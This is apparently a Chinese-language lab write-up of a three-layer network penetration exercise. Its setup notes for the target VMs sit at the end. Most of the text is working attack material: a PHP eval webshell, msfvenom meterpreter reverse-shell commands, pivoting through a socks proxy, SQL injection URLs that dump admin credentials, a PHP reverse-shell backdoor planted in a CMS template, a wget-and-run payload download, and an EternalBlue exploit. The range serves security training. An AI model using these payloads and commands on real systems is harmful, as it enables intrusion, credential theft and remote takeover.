kali IP:192.168.5.0/24
Goby反手一波
写shell
echo '<?php @eval($_POST[a]);?>' > /www/wwwroot/ThinkPHP/public/shell.php
蚁剑连接 http://192.168.5.143/shell.php
使用msfvenom生成对应的反向shellcode:
msfvenom -plinux/x64/meterpreter/reverse_tcp LHOST=192.168.5.144 LPORT=4444 -f elf > shell.elf
执行 上线msf use exploit/multi/handler set payload linux/x64/meterpreter/reverse_tcp set lhost 192.168.5.144 set lport 4444 run
获取内网ip段
run get_local_subnets Local subnet: 192.168.5.0/255.255.255.0 Local subnet: 192.168.22.0/255.255.255.0 Local subnet: 192.168.122.0/255.255.255.0 5是模拟外网 22 是内网
添加路由
run autoroute -s 192.168.22.0/24
查看内网ip
arp -a
配置socke代理 use auxiliary/server/socks4a 直接run 代理启动 配置proxychains
扫描22
proxychains nmap -Pn -sT 192.168.22.22
浏览器设置socks4 代理 1080
二层网络
单引号报错 存在注入
查看数据库
http://192.168.22.22/index.php?r=vul&keyword=1%27%20and%20updatexml(1,concat(0x7e,%20database(),0x7e),1)--+
查看数表
http://192.168.22.22/index.php?r=vul&keyword=1'and updatexml(1,concat(0x7e,substr((select group_concat(table_name) frominformation_schema.tables where table_schema='bagecms'),1,32),0x7e),1)--+
获取字段
http://192.168.22.22/index.php?r=vul&keyword=1'and updatexml(1,concat(0x7e,substr((select group_concat(column_name) frominformation_schema.columns where table_schema='bagecms' andtable_name='bage_admin'),1,32),0x7e),1)--+
获取值 - 密码
http://192.168.22.22/index.php?r=vul&keyword=1' and updatexml(1,concat(0x7e,substr((select concat(username,0x7e,password) from bagecms.bage_admin),1,31),0x7e),1)--+
登录后台
admin 123qwe
模板 tag页面 index.php 测试下
写入php反弹shell <?php set_time_limit(0); $ip=$_POST['ip']; $port=$_POST['port']; $fp=@fsockopen($ip,$port,$errno,$errstr); if(!$fp){echo "error";} else{ fputs($fp,"\n+++++++++++++connect sucess+++++++++\n"); while(!feof($fp)){ fputs($fp,"shell:"); $shell=fgets($fp); $message=`$shell`; fputs($fp,$message); } fclose($fp); }
http://192.168.22.22/index.php?r=tag
下载 shell.elf 反弹shell
kali python -m SimpleHTTPServer 8000 shell: wget http://192.168.5.31:8000/shell.elf chmod 777 shell.elf ./shell.elf
三层网络
proxychains nmap -Pn -sT 192.168.33.33
乍一看 开启了135 445 永恒之蓝了解一下
扫描17-010 auxiliary/scanner/smb/smb_ms17_010
攻击
exploit/windows/smb/ms17_010_psexe set payload windows/meterpreter/bind_tcp set rhost 192.168.33.33 run
ok 结束
靶机地址:
链接:https://pan.baidu.com/s/16Rd-3TpKLtFIf2ObWXxN6g
提取码:957b
环境配置:
centos 双网卡
桥接
NET 192.168.22.0/24
登录进去 init 5 切换桌面模式 图形化配置ip
ubuntu 双网卡
NET 192.168.22.0/24
仅主机 192.168.33.0/24
auto ens33 iface ens33 inet static address 192.168.22.22 netmask 255.255.255.0 gateway 192.168.22.254 auto ens38 iface ens38 inet static address 192.168.33.22 netmask 255.255.255.0 gateway 192.168.33.1
win7 仅主机模式
